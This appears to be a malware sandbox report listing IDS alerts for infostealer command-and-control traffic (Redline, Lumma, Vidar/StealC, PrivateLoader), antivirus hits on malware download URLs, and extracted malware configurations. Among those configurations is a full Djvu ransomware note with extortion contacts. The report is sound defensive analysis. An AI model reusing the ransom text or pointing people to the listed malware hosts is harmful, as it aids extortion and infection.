Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-10T16:14:09.135938+0200
SID:	2803274
Severity:	2
Source Port:	49823
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:13:08.884788+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:13:09.402261+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Observed Lumma Stealer Related Domain (quialitsuzoxm .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-10T16:12:54.144101+0200
SID:	2054951
Severity:	1
Source Port:	49778
Destination Port:	443
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:13:13.648270+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 78.46.239.218

Timestamp:	2024-08-10T16:13:09.406151+0200
SID:	2028765
Severity:	3
Source Port:	49794
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:13:14.512964+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (celebratioopz .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-08-10T16:12:44.846198+0200
SID:	2054964
Severity:	1
Source Port:	51062
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 78.46.239.218

Timestamp:	2024-08-10T16:13:02.539567+0200
SID:	2028765
Severity:	3
Source Port:	49789
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-08-10T16:12:52.218808+0200
SID:	2036289
Severity:	2
Source Port:	52991
Destination Port:	53
Protocol:	UDP
Classtype:	Crypto Currency Mining Activity Detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 78.46.239.218

Timestamp:	2024-08-10T16:13:00.321544+0200
SID:	2028765
Severity:	3
Source Port:	49785
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (deallerospfosu .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-08-10T16:12:46.902113+0200
SID:	2054960
Severity:	1
Source Port:	65137
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (writerospzm .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-08-10T16:12:46.489067+0200
SID:	2054962
Severity:	1
Source Port:	55940
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 78.46.239.218

Timestamp:	2024-08-10T16:13:11.565090+0200
SID:	2028765
Severity:	3
Source Port:	49797
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.76.141

Timestamp:	2024-08-10T16:12:44.652440+0200
SID:	2054653
Severity:	1
Source Port:	49758
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:12:54.809665+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 78.46.239.218

Timestamp:	2024-08-10T16:13:03.696594+0200
SID:	2028765
Severity:	3
Source Port:	49791
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 78.46.239.218

Timestamp:	2024-08-10T16:13:06.097155+0200
SID:	2028765
Severity:	3
Source Port:	49792
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (languagedscie .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-08-10T16:12:50.563690+0200
SID:	2054954
Severity:	1
Source Port:	57633
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (quialitsuzoxm .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-08-10T16:12:53.431440+0200
SID:	2054950
Severity:	1
Source Port:	55837
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 78.46.239.218

Timestamp:	2024-08-10T16:12:55.932815+0200
SID:	2028765
Severity:	3
Source Port:	49782
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config - Source IP: 78.46.239.218 - Destination IP: 192.168.2.4

Timestamp:	2024-08-10T16:12:55.155912+0200
SID:	2044247
Severity:	1
Source Port:	443
Destination Port:	49779
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:13:18.409133+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST - Source IP: 192.168.2.4 - Destination IP: 78.46.239.218

Timestamp:	2024-08-10T16:12:55.155832+0200
SID:	2049087
Severity:	1
Source Port:	49779
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-10T16:12:51.768755+0200
SID:	2054653
Severity:	1
Source Port:	49772
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:12:55.279836+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:13:08.456864+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (mennyudosirso .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-08-10T16:12:49.222422+0200
SID:	2054956
Severity:	1
Source Port:	58154
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 45.9.91.71 - Destination IP: 192.168.2.4

Timestamp:	2024-08-10T16:12:47.388221+0200
SID:	2043234
Severity:	1
Source Port:	46967
Destination Port:	49762
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 78.46.239.218

Timestamp:	2024-08-10T16:12:59.691558+0200
SID:	2028765
Severity:	3
Source Port:	49784
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:13:03.219588+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:12:55.498932+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 78.46.239.218

Timestamp:	2024-08-10T16:13:07.855146+0200
SID:	2028765
Severity:	3
Source Port:	49793
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:13:17.292122+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 - Source IP: 78.46.239.218 - Destination IP: 192.168.2.4

Timestamp:	2024-08-10T16:12:56.806357+0200
SID:	2051831
Severity:	1
Source Port:	443
Destination Port:	49782
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:13:12.203272+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-10T16:12:57.525068+0200
SID:	2054653
Severity:	1
Source Port:	49783
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.73.43

Timestamp:	2024-08-10T16:12:50.190051+0200
SID:	2054653
Severity:	1
Source Port:	49770
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-10T16:12:49.195468+0200
SID:	2054653
Severity:	1
Source Port:	49767
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 78.46.239.218

Timestamp:	2024-08-10T16:12:52.995313+0200
SID:	2028765
Severity:	3
Source Port:	49776
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 78.46.239.218

Timestamp:	2024-08-10T16:12:54.503229+0200
SID:	2028765
Severity:	3
Source Port:	49779
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Observed Lumma Stealer Related Domain (bassizcellskz .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-10T16:12:48.695055+0200
SID:	2054959
Severity:	1
Source Port:	49767
Destination Port:	443
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) - Source IP: 45.9.91.71 - Destination IP: 192.168.2.4

Timestamp:	2024-08-10T16:12:52.745110+0200
SID:	2046056
Severity:	1
Source Port:	46967
Destination Port:	49762
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:13:11.877223+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:13:12.413570+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE PrivateLoader CnC Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 185.225.200.214

Timestamp:	2024-08-10T16:12:20.689970+0200
SID:	2054711
Severity:	1
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:13:18.696605+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE PrivateLoader CnC Response - Source IP: 185.225.200.214 - Destination IP: 192.168.2.4

Timestamp:	2024-08-10T16:12:19.359248+0200
SID:	2054710
Severity:	1
Source Port:	80
Destination Port:	49732
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 78.46.239.218

Timestamp:	2024-08-10T16:13:14.594749+0200
SID:	2028765
Severity:	3
Source Port:	49798
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.47.141

Timestamp:	2024-08-10T16:12:46.221278+0200
SID:	2054653
Severity:	1
Source Port:	49759
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE PrivateLoader CnC Activity (GET) - Source IP: 192.168.2.4 - Destination IP: 185.225.200.214

Timestamp:	2024-08-10T16:12:14.958861+0200
SID:	2054709
Severity:	1
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE PrivateLoader CnC Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 185.225.200.214

Timestamp:	2024-08-10T16:12:41.917157+0200
SID:	2054711
Severity:	1
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Observed Lumma Stealer Related Domain (writerospzm .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 104.21.16.74

Timestamp:	2024-08-10T16:12:46.900544+0200
SID:	2054963
Severity:	1
Source Port:	49763
Destination Port:	443
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST - Source IP: 192.168.2.4 - Destination IP: 78.46.239.218

Timestamp:	2024-08-10T16:12:53.676087+0200
SID:	2049087
Severity:	1
Source Port:	49776
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (bassizcellskz .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-08-10T16:12:48.207236+0200
SID:	2054958
Severity:	1
Source Port:	50847
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST - Source IP: 192.168.2.4 - Destination IP: 78.46.239.218

Timestamp:	2024-08-10T16:12:56.805945+0200
SID:	2049087
Severity:	1
Source Port:	49782
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Observed Lumma Stealer Related Domain (languagedscie .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-10T16:12:51.277332+0200
SID:	2054955
Severity:	1
Source Port:	49772
Destination Port:	443
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Vidar Stealer Form Exfil - Source IP: 192.168.2.4 - Destination IP: 38.180.132.96

Timestamp:	2024-08-10T16:13:18.093254+0200
SID:	2054495
Severity:	1
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 78.46.239.218

Timestamp:	2024-08-10T16:13:16.125518+0200
SID:	2028765
Severity:	3
Source Port:	49799
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:12:55.057691+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:12:59.780017+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:13:17.297277+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 78.46.239.218

Timestamp:	2024-08-10T16:12:49.798203+0200
SID:	2028765
Severity:	3
Source Port:	49769
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:12:47.137434+0200
SID:	2046045
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 78.46.239.218

Timestamp:	2024-08-10T16:12:51.569090+0200
SID:	2028765
Severity:	3
Source Port:	49773
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Observed Lumma Stealer Related Domain (deallerospfosu .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 104.21.69.39

Timestamp:	2024-08-10T16:12:47.533697+0200
SID:	2054961
Severity:	1
Source Port:	49764
Destination Port:	443
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.14.101

Timestamp:	2024-08-10T16:12:52.988072+0200
SID:	2054653
Severity:	1
Source Port:	49774
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (complaintsipzzx .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-08-10T16:12:51.851157+0200
SID:	2054952
Severity:	1
Source Port:	65374
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:13:16.959222+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Observed Lumma Stealer Related Domain (complaintsipzzx .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 104.21.14.101

Timestamp:	2024-08-10T16:12:52.460611+0200
SID:	2054953
Severity:	1
Source Port:	49774
Destination Port:	443
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-10T16:12:54.633726+0200
SID:	2054653
Severity:	1
Source Port:	49778
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 45.9.91.71

Timestamp:	2024-08-10T16:13:16.743314+0200
SID:	2043231
Severity:	1
Source Port:	49762
Destination Port:	46967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 78.46.239.218

Timestamp:	2024-08-10T16:13:01.399921+0200
SID:	2028765
Severity:	3
Source Port:	49788
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://147.45.44.104/prog/66ae9cc050ded_file0308.exe#fileotr6	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66ae9cc050ded_file0308.exe#fileotr#	Avira URL Cloud: Label: malware
Source: https://helleaa.com/temp/random.exe)	Avira URL Cloud: Label: phishing
Source: https://celebratioopz.shop/api	Avira URL Cloud: Label: malware
Source: api.garageserviceoperation.com/CoreOPT/index.php	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66b623c3b1dcb_Mowdiewart.exe?	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66b5ac1092454_otraba.exe#otrb24859611ad_agent_3.exe	Avira URL Cloud: Label: phishing
Source: http://147.45.44.104/prog/66b623c3b1dcb_Mowdiewart.exe.	Avira URL Cloud: Label: malware
Source: https://mennyudosirso.shop/api	Avira URL Cloud: Label: malware
Source: https://helleaa.com/temp/random.exe	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66ae9cc050ded_file0308.exe#fileotr	Avira URL Cloud: Label: malware
Source: http://helsinki-dtc.com/updates/yd/yt_wrtzr_1/win/version.txt?TCtDuRUdKYZTtiynHOebqmOBgoFjjnvzy	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/inc/armadegon.exe=	Avira URL Cloud: Label: phishing
Source: https://steamcommunity.com/profiles/76561199724331900	Avira URL Cloud: Label: malware
Source: http://147.45.47.59/d6f30af05ffe50bf.php	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66b5b75106ac6_stealc.exe#spaceet	Avira URL Cloud: Label: phishing
Source: http://194.58.114.223/d/525403	Avira URL Cloud: Label: malware
Source: http://skrptfiles.tracemonitors.com/updates/yd/yt_wrtzr_1/win/version.txt?rwPMUQxcTIPiQpiDrtjTaQVThGnaNHXkE	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/inc/armadegon.exe$C	Avira URL Cloud: Label: phishing
Source: http://147.45.44.104/prog/66b5d9d3adbaa_defaultr.exe#spacet	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66b5d9d3adbaa_defaultr.exe#spacen	Avira URL Cloud: Label: malware
Source: https://complaintsipzzx.shop/api	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66b5b75106ac6_stealc.exe#spaceT	Avira URL Cloud: Label: phishing
Source: https://helleaa.com/temp/random.exe0309	Avira URL Cloud: Label: phishing
Source: https://helleaa.com/	Avira URL Cloud: Label: phishing
Source: https://helleaa.com:80/temp/random.exe	Avira URL Cloud: Label: phishing
Source: http://www.rapidfilestorage.com/updates/yd/yt_wrtzr_1/win/version.txt?KubbvdjJfOkOrksIlOLwwrZZFcTPifwjk	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66b5d9d3adbaa_defaultr.exe#spacee	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66b5ac1092454_otraba.exe#otr	Avira URL Cloud: Label: phishing
Source: https://yip.su/1cN8u7	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66b24859611ad_agent_3[1].exe	Avira: detection malicious, Label: TR/Redcap.turvo
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Avira: detection malicious, Label: HEUR/AGEN.1318094
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66ae9cc050ded_file0308[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1318094
Source: C:\Program Files (x86)\NetVoyager\nv.exe	Avira: detection malicious, Label: TR/Redcap.turvo

Found malware configuration

Source: 00000008.00000002.3000839541.0000000003DB1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "45.9.91.71:46967", "Bot Id": "test", "Message": "", "Authorization Header": "865df444adac1c44e9e7126852c2cca4"}
Source: 00000024.00000002.2468755517.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199751190313"], "Botnet": "de2cea1f145998409041f17e238ab295"}
Source: 00000011.00000002.2723255959.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://147.45.47.59/d6f30af05ffe50bf.php"}
Source: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Djvu {"Download URLs": [""], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0874PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\del
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	Malware Configuration Extractor: Amadey {"C2 url": "api.garageserviceoperation.com/CoreOPT/index.php", "Version": "4.41"}

Multi AV Scanner detection for domain / URL

Source: yip.su	Virustotal: Detection: 7%	Perma Link
Source: pool.hashvault.pro	Virustotal: Detection: 5%	Perma Link
Source: arpdabl.zapto.org	Virustotal: Detection: 12%	Perma Link
Source: service-domain.xyz	Virustotal: Detection: 11%	Perma Link
Source: api.2ip.ua	Virustotal: Detection: 6%	Perma Link
Source: helleaa.com	Virustotal: Detection: 15%	Perma Link
Source: tenntysjuxmz.shop	Virustotal: Detection: 24%	Perma Link
Source: env-3936544.jcloud.kz	Virustotal: Detection: 6%	Perma Link
